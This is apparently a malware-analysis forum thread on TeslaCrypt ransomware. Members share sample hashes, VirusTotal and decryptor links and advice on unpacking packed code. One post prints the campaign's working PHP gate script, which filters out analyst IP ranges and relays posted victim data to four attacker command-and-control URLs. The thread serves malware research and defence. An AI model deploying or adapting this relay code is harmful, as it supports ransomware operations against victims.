[rough_spear]

Hi,

Teslacrypt malware executable.

MD5 - 280D48953880C4A27DF69957916F718F

Regards,

rough_spear.

[ikolor]

next

https://www.virustotal.com/en/file/787c ... /analysis/

[thehole2]

next

https://www.virustotal.com/en/file/787c ... /analysis/

teslacrypt

[Xylitol]

TeslaDecoder ~ http://www.bleepingcomputer.com/forums/ ... eslacrypt/
TeslaCrack ~ https://github.com/Googulator/TeslaCrack

[nautiyal.ashish]

AlphaCrypt - this looks heavily based on TeslaCrypt (based on some quick static analysis anyways)

I originally found a post about it here http://www.malware-traffic-analysis.net ... index.html

Attaching the sample for convenience

https://www.virustotal.com/en/file/7bdc ... 430412022/

Hi,
I tried to perform analysis on this sample.
Based on static and basic dynamic analysis, i was able to figure out its functionality.
But when i moved to OllyDbg and IdaPro, to dig deeper, I feel completely lost.
I am relatively new to reverse engineering, and have analysed 5-6 malware till date. Everytime when i used to check them on IdaPro/OllyDbg, i could actually see them using Windows libraries and it was kind of easy to follow the flow of execution.
However, with this sample, I know they are using many windows libraries because of prior analysis, but seems to have been used in a different way (I am assuming using GetProcAddress). Because of this I am not able to see the flow of execution and its hard for me to answer questions like what kind of encryption technique is into use.
Can someone tell me how to approach situations like these.
Appreciate the help :)

Regards,
Ashish

[maximusdecimer]

Ashish,

First level of today's malwares would be a polymorphic code. Sometimes two or three levels of polycode can be expected. This is called FUD to avoid av detection. Try to spend a couple of weeks to unpack them.
Very painful indeed but learn to enjoy it. Ollydbg is enough to unpack most of the samples.

Maximus

[nautiyal.ashish]

Ashish,

First level of today's malwares would be a polymorphic code. Sometimes two or three levels of polycode can be expected. This is called FUD to avoid av detection. Try to spend a couple of weeks to unpack them.
Very painful indeed but learn to enjoy it. Ollydbg is enough to unpack most of the samples.

Maximus

Hi Maximusdecimer,
Thank you for the advice. I had been trying to analyse it and found as you mentioned, that this is a self modifying code. Right now still struggling with getting the dump of the actual infecting code and its OEP. However, after each analysis, I believe my understanding of the process is developing.
I tried using the common OllyDbg plugin of setting breakpoint on section hop to find OEP, but i guess the code is able to successfully evade it. If i succeed i will post my findings here :)
Regards,
Ashish

[benkow_]

PHP gate version april 2016.

Code: Select all

<?php
$network=ip2long("23.96.0.0");
$mask=ip2long("255.248.0.0");
$remote=ip2long($_SERVER['REMOTE_ADDR']);
if (($remote & $mask)==$network){     header("Location: http://google.com");    exit; }
if($_SERVER['REMOTE_ADDR']=='63.211.192.5'){     header("Location: http://google.com");    exit; }
 
if(!isset($_POST['data'])){        die("empty post");     }
$post = array('data'=>$_POST['data'], 'IP'=>$_SERVER['REMOTE_ADDR'], 'SHELL'=>$_SERVER['SERVER_NAME'],);
 
$gate = array(
    "http://u24er.ovaarmor.com/ing.php",
    "http://l123d.feustude.at/ing.php",
    "http://k234s.ascotsprue.com/ing.php",
    "http://ik4dm.mazerunci.at/ing.php",
);                                                                                                                                                                                                        $fp = fopen("most128.txt", "a+"); fwrite($fp, 'data='.$_POST['data'].' IP='.$_SERVER['REMOTE_ADDR'].' SHELL='.$_SERVER['SERVER_NAME']."\n");  fclose($fp);
 
 
 
foreach( $gate as $value ){
    $process = curl_init();
    curl_setopt($process, CURLOPT_URL, $value);
    curl_setopt($process, CURLOPT_POST, 1);
    curl_setopt($process, CURLOPT_POSTFIELDS,$post);
    curl_setopt($process, CURLOPT_RETURNTRANSFER, true);
    if( ! $result = curl_exec($process)) { continue;}
    if(stristr($result,"work:")){echo $result; curl_close($process);die();}
    if(stristr($result,"INSERTED")){echo $result;curl_close($process);die();}
    curl_close($process);
}
?>

Stupid question: someone know what is this IP 63.211.192.5?

[benkow_]

"TeslaCrypt shuts down and Releases Master Decryption Key"

http://www.bleepingcomputer.com/news/se ... ption-key/

free universal decrypting tool

[rammsteinse]

Hello, I infected with this ransomware sample "TeslaCrypt Ransomware.rar", some important files were encrypted, now they have the extension "ecc", I have tried several tools to decrypt and none has worked for me, I need help, some of these files are very important For me, PLEASE HELP.